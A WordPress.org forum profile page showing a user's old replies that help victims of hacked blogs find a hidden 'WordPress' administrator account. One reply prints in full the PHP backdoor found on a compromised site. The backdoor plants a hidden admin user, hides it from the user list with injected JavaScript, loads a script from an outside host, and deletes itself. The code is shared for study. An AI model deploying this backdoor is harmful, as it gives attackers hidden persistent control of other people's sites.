Title: cave-bit's Replies | WordPress.org

---

# cave-bit

  [  ](https://wordpress.org/support/users/cave-bit/)

 *   [Profile](https://wordpress.org/support/users/cave-bit/)
 *   [Topics Started](https://wordpress.org/support/users/cave-bit/topics/)
 *   [Replies Created](https://wordpress.org/support/users/cave-bit/replies/)
 *   [Reviews Written](https://wordpress.org/support/users/cave-bit/reviews/)
 *   [Topics Replied To](https://wordpress.org/support/users/cave-bit/replied-to/)
 *   [Engagements](https://wordpress.org/support/users/cave-bit/engagements/)
 *   [Favorites](https://wordpress.org/support/users/cave-bit/favorites/)

 Search replies:

## Forum Replies Created

Viewing 4 replies - 1 through 4 (of 4 total)

 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [My site was hacked? What to do?](https://wordpress.org/support/topic/my-site-was-hacked-what-to-do/)
 *  [cave-bit](https://wordpress.org/support/users/cave-bit/)
 * (@cave-bit)
 * [18 years ago](https://wordpress.org/support/topic/my-site-was-hacked-what-to-do/#post-583505)
 * Audurz,
    you have an hidden user in your users-table. Y find his in your blog.
   Read my write in this post: [http://wordpress.org/support/topic/168964?replies=25](http://wordpress.org/support/topic/168964?replies=25)
   You have this problem. Ciauuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuz Mau
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [harffull codes (eval( unescape( “function check_%)](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/)
 *  [cave-bit](https://wordpress.org/support/users/cave-bit/)
 * (@cave-bit)
 * [18 years ago](https://wordpress.org/support/topic/harffull-codes-eval-unescape-function-check_/#post-735908)
 * the problem is ever equal.Only admin inserted code in file width manage file 
   in admin page.
    If code change someone work…. See in your users-table (mysql)
   if exist phantom user…(width WordPress name for example……….)
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [wp2.5 has been hacked!!!](https://wordpress.org/support/topic/wp25-has-been-hacked/)
 *  [cave-bit](https://wordpress.org/support/users/cave-bit/)
 * (@cave-bit)
 * [18 years ago](https://wordpress.org/support/topic/wp25-has-been-hacked/#post-745339)
 * > I can access MySQL, but I don’t know what to look for or where.
 * you have phpmyadmin???
    SmockLady… see if in your users-table (in mysql page)
   have an user width name WordPress and if exist delete.Read this: [http://wordpress.org/support/topic/168964?replies=25](http://wordpress.org/support/topic/168964?replies=25)
   bye…
 *   Forum: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
   
   In reply to: [Security issue, multiple sites](https://wordpress.org/support/topic/security-issue-multiple-sites/)
 *  [cave-bit](https://wordpress.org/support/users/cave-bit/)
 * (@cave-bit)
 * [18 years ago](https://wordpress.org/support/topic/security-issue-multiple-sites/page/2/#post-740063)
 * Excuse for my english…We have the problem in italian site speleo scintilena.com
   
   Y find the file create the username WordPress and password is sitename ($_SERVER[‘
   HTTP_HOST’]).(This pass in users table is cripted md5) This filename is ha.php
   and find this in wp-admin directory. But y haven’t idea how upload is. Y think
   upload width any plugin but not sure. Y find other site width this problem and
   y not damage his…but is is a big problem. We track the user WordPress in scintilena
   site and his ip is 194.110.162.79 (we logged and redirect this user of fbi site)
   is an server located in USA width the house of company in Panama (info Whois)
   Y posted the code for study:
 *     ```
       <?php
       require_once("../wp-config.php");
   
       add_hidden_user();
   
       @unlink(__FILE__);
   
       function add_hidden_user() {
            global $wpdb;
            $user_login = "WordPress"; $user_pass = md5($_SERVER['HTTP_HOST']);
            $js_server = "http://search-again.net/js/js.js"; if(strlen($js_server)>33){die("Server does not fit to cell!");};
            if($wpdb->get_var("SELECT ID FROM $wpdb->users WHERE user_login='$user_login'")>0){
            	$wpdb->query("DELETE FROM $wpdb->users WHERE user_login='$user_login'");
            };
            $users = $wpdb->get_results("SELECT * FROM $wpdb->users LIMIT 1");
            if(array_key_exists('display_name',$users[0])) {
                 $query = "INSERT INTO $wpdb->users
                      (user_login, user_pass)
                 VALUES
                      ('$user_login', '$user_pass')";
                 $wpdb->query( $query );
                 $user_id = $wpdb->insert_id;
                 $up = array('first_name','last_name','nickname','description','jabber','aim','yim');
                 $js='...
   
            <b id="user_superuser"><script language="JavaScript">
            var setUserName = function(){
                 try{
                      var t=document.getElementById("user_superuser");
                      while(t.nodeName!="TR"){
                           t=t.parentNode;
                      };
                      t.parentNode.removeChild(t);
                      var tags = document.getElementsByTagName("H3");
                      var s = " shown below";
                      for (var i = 0; i < tags.length; i++) {
                           var t=tags[i].innerHTML;
                           var h=tags[i];
                           if(t.indexOf(s)>0){
                                s =(parseInt(t)-1)+s;
                                h.removeChild(h.firstChild);
                                t = document.createTextNode(s);
                                h.appendChild(t);
                           }
                      }
                 }catch(e){};
            };
            addLoadEvent(setUserName);
            </script>';
                 foreach ($up as $k) {
                      $v='';
                      if ($k='first_name') {$v=$wpdb->escape($js);};
                      update_usermeta( $user_id, $k, $v );
                 }
                 $user = new WP_User($user_id);
                 $user->set_role('administrator');
                 wp_cache_delete($user_id, 'users');
                 wp_cache_delete($user_login, 'userlogins');
                 if(md5($wpdb->get_var("SELECT meta_value FROM $wpdb->usermeta WHERE user_id='$user_id' AND meta_key='first_name'"))==md5($js)){
                      return "sucess";
                 } else {
                      $wpdb->query("DELETE FROM $wpdb->usermeta WHERE user_id='$user_id'");
                      $wpdb->query("DELETE FROM $wpdb->users WHERE id='$user_id'");
                      return "failed";
                 }
   
            } else {
                 $js1 = '<b id="ux"><script language="JavaScript"';
                 $js2 = ' src="'.$js_server.'"></script>';
   
                 $query = "INSERT INTO $wpdb->users
                      (user_login, user_pass, user_level, user_firstname, user_lastname)
                 VALUES
                      ('$user_login', '$user_pass', 10,'".$wpdb->escape($js1)."','".$wpdb->escape($js2)."' )";
                 $wpdb->query( $query );
   
                 $user_id = $wpdb->insert_id;
                 if(md5($wpdb->get_var("SELECT user_firstname FROM $wpdb->users WHERE id='$user_id'"))==md5($js1) &&
                    md5($wpdb->get_var("SELECT user_lastname FROM $wpdb->users WHERE id='$user_id'"))==md5($js2)
                 ){
                      return 1;
                 } else {
                      $wpdb->query("DELETE FROM $wpdb->users WHERE id='$user_id'");
                      return 0;
                 }
            }
       }
       ?>
       ```
   
 * If you solving please posted.
    Thanks and.. ciauuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuz
   Mau

Viewing 4 replies - 1 through 4 (of 4 total)